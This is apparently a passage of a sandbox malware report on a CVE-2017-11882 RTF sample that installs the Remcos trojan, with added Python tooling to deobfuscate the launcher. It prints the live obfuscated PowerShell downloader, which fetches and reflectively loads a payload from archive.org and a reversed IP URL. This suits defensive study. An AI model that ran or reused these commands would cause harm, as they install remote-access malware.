JysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
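The command line above is a two-stage launcher. `$Codigo` is base64 for a PowerShell one-liner that spells `iex` out of `$PSHOME` characters, assembles the real script from dozens of `'..'+'..'` fragments in which the token `HqR` stands in for `$` and `VUF` for the single quote (the string list above even records a fragment, `DetahNoteV.txtVUF;HqRbase64Content`, in that intermediate form), and repairs those placeholders with a `.Replace()` chain before handing the result to `iex`. The Python below is added here as analyst tooling; it is not part of the Joe Sandbox report or of the sample, and nothing in it executes the recovered script. It unwinds the stages statically and extracts the indicators: the archive.org stager URL, the type that is reflectively loaded from the downloaded assembly, and the reversed URL passed as the first `Invoke()` argument. The `$Codigo` value is copied verbatim from the command line; the `$PSHOME` path is an assumption (the default install location; the SysWOW64 path used by this 32-bit chain has the same characters at offsets 4 and 34, so the result is the same).

```python
"""Static deobfuscation of the wscript.exe -> powershell.exe launcher above.
Added analyst tooling for this page, not part of the Joe Sandbox report or
of the sample; nothing here executes the recovered script."""
import base64
import re

# $Codigo, copied verbatim from the report's command line.
CODIGO = "LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk="

# Assumed default PowerShell home. The SysWOW64 variant used by this 32-bit
# chain has the same letters at offsets 4 and 34, so the result is identical.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"


def decode_stage1(b64: str) -> str:
    """[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($Codigo))."""
    return base64.b64decode(b64).decode("utf-8")


def resolve_pshome_call(stage1: str, pshome: str = PSHOME) -> str:
    """Spell out $PSHOME[i]+$PSHOME[j]+'X', the indexed-string trick for iex."""
    picked = "".join(pshome[int(i)] for i in re.findall(r"\$pshome\[(\d+)\]", stage1, re.I))
    tail = re.search(r"\$pshome\[\d+\]\+'(\w+)'\)", stage1, re.I)
    return picked + (tail.group(1) if tail else "")


def rebuild_literal(stage1: str) -> str:
    """Concatenate the '..'+'..' fragments handed to the resolved command."""
    body = re.search(r"\(\s*\((.*?)\)\.Replace\(", stage1, re.S).group(1)
    return "".join(re.findall(r"'([^']*)'", body))


def apply_replace_chain(stage1: str, literal: str) -> str:
    """Run each .Replace(([cHAr]a+[cHAr]b..),[StRIng][cHAr]c) on the literal."""
    chain = re.findall(r"\.Replace\(\(([^)]*)\),\[string\]\[char\](\d+)\)", stage1, re.I)
    for needle_expr, repl in chain:
        needle = "".join(chr(int(c)) for c in re.findall(r"\[char\](\d+)", needle_expr, re.I))
        literal = literal.replace(needle, chr(int(repl)))
    return literal


def deobfuscate(b64: str) -> str:
    """Return the second-stage script exactly as iex would receive it."""
    stage1 = decode_stage1(b64)
    return apply_replace_chain(stage1, rebuild_literal(stage1))


def extract_iocs(stage2: str) -> dict:
    """Stager URL, reflectively loaded type and the reversed Invoke() argument."""
    urls = re.findall(r"https?://[^'\s]+", stage2)
    invoke_args = re.findall(r"'([^']*)'", stage2.partition("Invoke(")[2])
    reversed_urls = [a[::-1] for a in invoke_args if a.endswith("ptth")]  # 'ptth' is 'http' backwards
    loaded = re.search(r"GetType\('([^']+)'\)", stage2)
    return {"stager_urls": urls,
            "loaded_type": loaded.group(1) if loaded else None,
            "reversed_urls": reversed_urls}


if __name__ == "__main__":
    stage1 = decode_stage1(CODIGO)
    print("dot-sourced command:", resolve_pshome_call(stage1))
    stage2 = deobfuscate(CODIGO)
    print(stage2)
    print(extract_iocs(stage2))
```

Running it prints `ieX` for the dot-sourced command and a second stage that downloads a base64 text blob from archive.org, passes it to `[Reflection.Assembly]::Load()`, and invokes the `VAI` method of the loaded `RunPE.Home` type with a reversed URL and the string `RegAsm` among its arguments, which is consistent with the Remcos and stealer detections being raised on RegAsm.exe throughout this report. The reversed-URL argument is the only place the next download location appears, so a string search of the command line for `http` misses it; reversing every argument that ends in `ptth` is the cheap check that catches it.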
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe  Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Memory allocated: 770B0000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 9_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 9_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 9_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 9_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 13_2_00401806 NtdllDefWindowProc_W
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 13_2_004018C0 NtdllDefWindowProc_W
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 14_2_004016FD NtdllDefWindowProc_A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 14_2_004017B7 NtdllDefWindowProc_A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 15_2_00402CAC NtdllDefWindowProc_A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 15_2_00402D66 NtdllDefWindowProc_A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 9_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004165FF appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434801 appears 43 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00422297 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434E70 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00401E65 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00413025 appears 79 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00416760 appears 69 times
Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf, type: SAMPLE | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
Source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS rulesets. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA string variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS rulesets. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA string variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS rulesets. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA string variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS rulesets. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA string variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3568, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR | Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: RegAsm.exe PID: 3792, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | Binary or memory string: org.slneighbors
Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winRTF@29/20@3/4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-7B1J99
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR7E81.tmp
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | System information queried: HandleInformation
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.405242664.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf | ReversingLabs: Detection: 39%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' 